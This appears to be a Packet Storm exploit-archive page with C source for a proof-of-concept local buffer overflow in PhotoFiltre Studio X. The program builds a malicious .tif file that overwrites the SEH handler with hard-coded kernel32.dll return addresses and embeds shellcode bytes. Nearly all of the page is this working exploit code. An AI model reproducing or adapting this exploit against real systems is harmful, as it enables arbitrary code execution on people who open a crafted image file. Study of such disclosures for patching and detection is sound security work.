exploit the possibilities

PhotoFiltre Studio X .tif Buffer Overflow

PhotoFiltre Studio X .tif Buffer Overflow
Posted May 5, 2010
Authored by fl0 fl0w

PhotoFiltre Studio X local buffer overflow proof of concept exploit that creates a malicious .tif file.

tags | exploit, overflow, local, proof of concept
MD5 | 8e591d65167b22d6fcfa24a296bdb055

PhotoFiltre Studio X .tif Buffer Overflow

Change Mirror Download
#include<stdio.h>

#define fisier FILE
#define ALOC(tip,n) (tip*)malloc(sizeof(tip)*n)
#define VER "10.3.0"
#define POCNAME "[*]PhotoFiltre Studio X .tif file local buffer overflow poc(0day)"
#define AUTHOR "[*]fl0 fl0w"
typedef char i8;
typedef short i16;
typedef int i32;
void gen_random(i8*,const int);
void print(i8*);
i32 mcpy(void*,const void*,i32);
void fwi32(fisier*,i32);
i32 filerr(fisier*);
void error(void);
void filebuild();
unsigned int getFsize(fisier*,i8*);
i32 sizes[]={257,163,217,213,940,29};
typedef struct {
/*Retcodes from MS Windows xp pro sp3
*/
i32 popopret;
i32 jmpbyte;
i32 jmpEBP;
}instr;
i32 main()
{filebuild();
printf("%s\n%s\n",POCNAME,AUTHOR);
print("file done");
getchar();
}
void filebuild() {
/*The logic: overwrite seh handler with pop pop ret,overwrite next seh with
jmp ebp,find the exact location ebp points to and write a jmp 0x40 bytes instr.
Because there isn't space for shellcode I chose this jmp ebp option.
And a egghunter wouldn't be the solution because u also need space for it.
*/
i8 tif1[]= {
0x49, 0x49, 0x2A, 0x00, 0x08, 0x00, 0x00, 0x00, 0x17, 0x00, 0xFE, 0x00, 0x04, 0x00, 0x01, 0x00,
0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x01, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFD, 0x01,
0x00, 0x00, 0x01, 0x01, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0xB6, 0x01, 0x00, 0x00, 0x02, 0x01,
0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x03, 0x01, 0x03, 0x00, 0x83, 0x00,
0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x06, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x03, 0x00,
0x00, 0x00, 0x0A, 0x01, 0xB6, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x11, 0x01,
0x04, 0x00, 0x37, 0x00, 0x00, 0x00, 0x22, 0x01, 0x00, 0x00, 0x12, 0x01, 0x03, 0x00, 0x01, 0x00,
0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x15, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00,
0x00, 0x00, 0x16, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x17, 0x01,
0x04, 0x00, 0x37, 0x00, 0x00, 0x00, 0xFE, 0x01, 0x00, 0x00, 0x1A, 0x01, 0x05, 0x00, 0x01, 0x00,
0x00, 0x00, 0xDA, 0x02, 0x00, 0x00, 0x1B, 0x01, 0x05, 0x00, 0x01, 0x00, 0x00, 0x00, 0xE2, 0x02,
0x00, 0x00, 0x1C, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x28, 0x01,
0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x29, 0x01, 0x03, 0x00, 0x02, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x43, 0x43, 0xEB, 0x05, 0x8C, 0x08, 0xFC, 0x7F, 0x43, 0x55, 0x89,
0xE5, 0x83, 0xEC, 0x18, 0xC7, 0x45, 0xFC, 0x77, 0x7A, 0x83, 0x7C, 0xC7, 0x44, 0x24, 0x04, 0xD0,
0x03, 0x00, 0x00, 0xC7, 0x04, 0x24, 0x01, 0x0E, 0x00, 0x00, 0x8B, 0x45, 0xFC, 0xFF, 0xD0, 0xC9,0xC3,
};
i8 tif2[]= {
0x92, 0x00, 0x92, 0x00, 0x96, 0x00, 0x00, 0x00, 0x00, 0x00, 0xAF, 0x00, 0x12, 0x00, 0x00, 0x00,
0x92, 0x00, 0x49, 0x00, 0x12, 0x00, 0x92, 0x00, 0xAF, 0x00, 0x92, 0x00, 0x49, 0x00, 0x49, 0x00,
0x49, 0x00, 0x58, 0x00, 0xAF, 0x00, 0x12, 0x00, 0x58, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00,
0x57, 0x00, 0x12, 0x00, 0x5A, 0x00, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x28, 0x00, 0x12, 0x00,
0x00, 0x00, 0x46, 0x00, 0xFD, 0x00, 0xD5, 0x00, 0x1B, 0x00, 0xFF, 0x00, 0xEF, 0x00, 0xA9, 0x00,
0xD9, 0x00, 0x00, 0x00, 0x70, 0x00, 0x6C, 0x00, 0xFA, 0x00, 0x99, 0x00, 0xC5, 0x00, 0xF7, 0x00,
0xB4, 0x00, 0x48, 0x00, 0xAB, 0x00, 0xE9, 0x00, 0xDE, 0x00, 0x1B, 0x00, 0xFF, 0x00, 0xD7, 0x00,
0x64, 0x00, 0xA9, 0x00, 0xD9, 0x00, 0x6E, 0x00, 0x68, 0x00, 0x70, 0x00, 0x92, 0x00, 0xCC, 0x00,
0xF2, 0x00, 0x99, 0x00, 0x94, 0x00, 0xE9, 0x00, 0xAD, 0x00, 0xB4, 0x00, 0x4B, 0x00, 0xC9, 0x00,
0x85, 0x00, 0xE9, 0x00, 0xE5, 0x00, 0xB4, 0x00, 0x80, 0x00, 0x98, 0x00, 0x8C, 0x00, 0xE0, 0x00,
0xC4, 0x00, 0x33,
};
/* tif1sz=v[1]
tif2sz[]=v[2]
sehoffset=v[3]
nsehoffset=v[4]
junksz=v[5]
jmpebpoffset=v[6] */
fisier* in=fopen("exploit.in","r"),
* out=fopen("exploit.tif","wb");
//i8 buf=ALOC(i8,100001);
i8 buf[100001];
instr* ASM;
ASM=ALOC(instr,sizeof(instr));
ASM->popopret=0x7C86CFC2;//pop esi pop edi ret from kernel32.dll
ASM->jmpbyte=0xeb400300;//jmp over(u need to cause a exception NOT a exit call,so work on the instr)
ASM->jmpEBP=0x7C81ACD3;//JMP EBP from kernel32.dll
memcpy(tif1+217,&ASM->popopret,4);
memcpy(tif1+213,&ASM->jmpEBP,4);
memcpy(tif1+29,&ASM->jmpbyte,4);
if(out){
fwrite(tif1,sizeof(i8),sizeof(tif1),out);
gen_random(&buf,940);
fwrite(&buf,sizeof(i8),940,out);
fwrite(tif2,sizeof(i8),sizeof(tif2),out);
fclose(out);
free(buf);
}
else {
error();
}

}
void error(void) {
perror("\nError:");
}
i32 filerr(fisier* F) {
return (ferror(F));
}
void readf(void) {

}

void fwi32(fisier* F,i32 adr) {
fputc(adr&0xff,F);
fputc((adr>>8)&0xff,F);
fputc((adr>>16)&0xff,F);
fputc((adr>>24)&0xff,F);
}
i32 mcpy(void* dest,const void* source,i32 len)
{ void* D=dest;
const void* S=source;
len=sizeof(source);
memcpy(D,S,len);
return (len);
}
void print(i8* msg)
{
printf("[*]%s\n",msg);
}
void gen_random(i8* s,const int len)
{ i32 i;
static const i8 alphanum[]= {
"0123456789ABCDEFGHIJKLMNOPQRST"
"UVWXYZabcdefghijklmnopqrstuvwxyz"};
for(i=1;i<len;++i)
{
s[i]=alphanum[rand()%(sizeof(alphanum)-1)];
}
s[len]=0;
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    10 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close